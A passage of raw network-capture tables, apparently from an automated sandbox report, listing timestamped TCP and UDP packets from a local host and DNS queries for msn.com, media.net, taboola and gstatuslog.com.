                                                                                                                                                                                                  Jan 22, 2021 10:16:43.448966026 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.450562000 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.450567007 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.451344967 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.451345921 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.451365948 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.452008963 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.452020884 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.452045918 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.452105999 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.453521013 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.454034090 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.454112053 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.461275101 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.475305080 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.475347042 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.475368023 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.475389957 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.479722977 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.482033968 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.482068062 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.482090950 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.482117891 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.482141972 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.482167006 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.486068964 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.486175060 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.493227959 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.493257046 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.494334936 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.494352102 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.495405912 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.495579958 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.495603085 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.496469975 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.496809006 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.496831894 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.497315884 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.497992039 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.498025894 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.499171972 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.499207973 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.500346899 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.500375032 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.501550913 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.501583099 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.502831936 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.502991915 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.503019094 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.503038883 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.503966093 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.503998041 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.505147934 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.505178928 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.505877972 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.506014109 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.506388903 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.506418943 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.506489038 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.506515026 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.507664919 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.507694006 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.508771896 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.508800983 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.509970903 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.510001898 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.511166096 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.511181116 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.511195898 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.511198044 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.511446953 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.512377024 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.512409925 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.512474060 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.512501001 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.513561010 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.513587952 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.513883114 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.514765978 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.514792919 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.514842987 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.514895916 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.515978098 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.516006947 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.517374039 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.517425060 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.518992901 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.522341967 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.522372007 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.522893906 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.522928953 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.524020910 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.524048090 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.525141954 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.525181055 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.528680086 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.531240940 CET44349749151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.532392979 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.532443047 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.540349007 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.541641951 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.542577982 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.544915915 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.108582020 CET4976780192.168.2.513.224.195.167
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.109090090 CET4976880192.168.2.513.224.195.167
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.148663998 CET804976713.224.195.167192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.148791075 CET4976780192.168.2.513.224.195.167
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.149080992 CET804976813.224.195.167192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.149173021 CET4976880192.168.2.513.224.195.167
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.150515079 CET4976780192.168.2.513.224.195.167
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.190551996 CET804976713.224.195.167192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.241319895 CET804976713.224.195.167192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.241426945 CET4976780192.168.2.513.224.195.167
                                                                                                                                                                                                  Jan 22, 2021 10:17:56.189893007 CET804976813.224.195.167192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:56.190047026 CET4976880192.168.2.513.224.195.167
                                                                                                                                                                                                  Jan 22, 2021 10:18:25.973231077 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:25.973490953 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:25.973686934 CET49749443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:25.973898888 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:25.974070072 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:25.974225044 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016030073 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016064882 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016109943 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016141891 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016194105 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016237974 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016443968 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016472101 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016727924 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016756058 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016813993 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016854048 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016917944 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016947031 CET44349749151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.016983986 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.017005920 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.017014027 CET44349749151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.017034054 CET49749443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.017060041 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.017067909 CET49749443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.026009083 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.026050091 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.026082993 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                  Jan 22, 2021 10:18:26.026113987 CET49744443192.168.2.5151.101.1.44

                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Jan 22, 2021 10:16:27.682310104 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:28.688386917 CET5475753192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:28.736242056 CET53547578.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:29.654058933 CET4999253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:29.705199957 CET53499928.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:30.652271986 CET6007553192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:30.702991962 CET53600758.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:34.944653034 CET5501653192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:35.002729893 CET53550168.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:36.279808998 CET6434553192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:36.337640047 CET53643458.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:36.605238914 CET5712853192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:36.653261900 CET53571288.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:37.110613108 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:37.125291109 CET5046353192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:37.158720970 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:37.185983896 CET53504638.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:38.698174000 CET5039453192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:38.762682915 CET53503948.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:39.105437994 CET5853053192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:39.174487114 CET53585308.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:40.843153954 CET5381353192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:40.909945965 CET53538138.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.185574055 CET6373253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.252257109 CET53637328.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.510584116 CET5734453192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.571748972 CET53573448.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.869982004 CET5445053192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.917887926 CET53544508.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.178606033 CET5926153192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.240962029 CET53592618.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:47.305521965 CET5715153192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:47.369425058 CET53571518.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:49.323597908 CET5941353192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:49.381422043 CET53594138.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:16:54.391680002 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:16:54.440376043 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:02.041423082 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:02.124161959 CET6508653192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:03.050508022 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:03.107142925 CET53516498.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:03.144588947 CET6508653192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:03.192388058 CET53650868.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:04.916218042 CET5643253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:04.964169979 CET53564328.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:05.904746056 CET5292953192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:05.936706066 CET5643253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:05.952795029 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:05.985153913 CET53564328.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:06.946111917 CET5292953192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:06.947282076 CET5643253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:06.994239092 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:07.003305912 CET53564328.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:07.951421976 CET5292953192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:07.999277115 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:08.951344013 CET5643253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:09.008780003 CET53564328.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:09.951391935 CET5292953192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:09.999279976 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:12.958554029 CET5643253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:13.006386042 CET53564328.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:13.701091051 CET6431753192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:13.768143892 CET53643178.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:13.958350897 CET5292953192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:14.016709089 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:17.590331078 CET6100453192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:17.641246080 CET53610048.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:17.720866919 CET5689553192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:17.769032001 CET53568958.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:23.680490017 CET6237253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:23.737031937 CET53623728.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.029376030 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.094314098 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:32.395457029 CET5667553192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:32.454945087 CET53566758.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:55.405694008 CET5717253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:55.462244034 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:56.392472982 CET5717253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:56.448858023 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:57.417893887 CET5717253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:57.466106892 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:17:59.408936977 CET5717253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:17:59.456979036 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:02.834412098 CET5526753192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:18:02.882538080 CET53552678.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:03.420125008 CET5717253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:18:03.468168974 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:18:04.557876110 CET5096953192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:18:04.622456074 CET53509698.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:05.513202906 CET6436253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:05.561187983 CET53643628.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:06.241692066 CET5476653192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:06.292524099 CET53547668.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:07.034096956 CET6144653192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:07.090723991 CET53614468.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:07.732542992 CET5751553192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:07.791248083 CET53575158.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:08.352313995 CET5819953192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:08.408703089 CET53581998.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:09.339308977 CET6522153192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:09.395726919 CET53652218.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:10.049135923 CET6157353192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:10.099904060 CET53615738.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:11.186925888 CET5656253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:11.243535995 CET53565628.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:12.444423914 CET5359153192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:12.504673958 CET53535918.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:12.991281986 CET5968853192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:13.044601917 CET53596888.8.8.8192.168.2.5
                                                                                                                                                                                                  Jan 22, 2021 10:19:50.507565022 CET5603253192.168.2.58.8.8.8
                                                                                                                                                                                                  Jan 22, 2021 10:19:50.571101904 CET53560328.8.8.8192.168.2.5

                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                  Jan 22, 2021 10:16:36.605238914 CET192.168.2.58.8.8.80x2464Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:38.698174000 CET192.168.2.58.8.8.80x9a61Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:39.105437994 CET192.168.2.58.8.8.80x90f2Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:40.843153954 CET192.168.2.58.8.8.80xffceStandard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.185574055 CET192.168.2.58.8.8.80x99bbStandard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.510584116 CET192.168.2.58.8.8.80xf42dStandard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.869982004 CET192.168.2.58.8.8.80xbfb0Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:43.178606033 CET192.168.2.58.8.8.80x75beStandard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:17:26.029376030 CET192.168.2.58.8.8.80xd66cStandard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:19:50.507565022 CET192.168.2.58.8.8.80x74d7Standard query (0)gstatuslog.comA (IP address)IN (0x0001)

                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                  Jan 22, 2021 10:16:36.653261900 CET8.8.8.8192.168.2.50x2464No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:38.762682915 CET8.8.8.8192.168.2.50x9a61No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:39.174487114 CET8.8.8.8192.168.2.50x90f2No error (0)contextual.media.net2.18.68.31A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:40.909945965 CET8.8.8.8192.168.2.50xffceNo error (0)hblg.media.net2.18.68.31A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jan 22, 2021 10:16:41.252257109 CET8.8.8.8192.168.2.50x99bbNo error (0)lg3.media.net2.18.68.31A (IP address)IN (0x0001)
